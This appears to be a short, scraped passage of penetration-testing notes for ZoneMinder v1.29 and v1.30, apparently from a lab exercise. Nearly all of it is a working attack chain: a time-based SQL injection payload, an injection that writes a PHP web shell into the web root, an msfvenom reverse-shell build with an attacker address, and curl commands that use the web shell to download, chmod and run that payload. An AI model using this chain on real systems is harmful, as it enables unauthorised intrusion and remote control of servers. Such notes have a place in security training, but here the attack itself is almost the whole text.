ZoneMinder
v1.29 & v1.30
&limit=100;(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434limit=100;SELECT "<?php echo shell_exec($_GET['c']); ?>" INTO OUTFILE '/var/www/html/webshell.php';#&minTime=1466674406.084434# Create a reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=80 -f elf -o revshell.elf
# Copy binary to the target
curl -s "http://<target-IP>:3305/webshell.php?c=wget+192.168.45.170/revshell.elf+-O+/tmp/revshell.elf"
# Assign executable permissions to the binary
curl -s "http://pebbles:3305/webshell.php?c=chmod+777+/tmp/revshell.elf"
# Execute the binary
curl -s "http://pebbles:3305/webshell.php?c=/tmp/revshell.elf"Last updated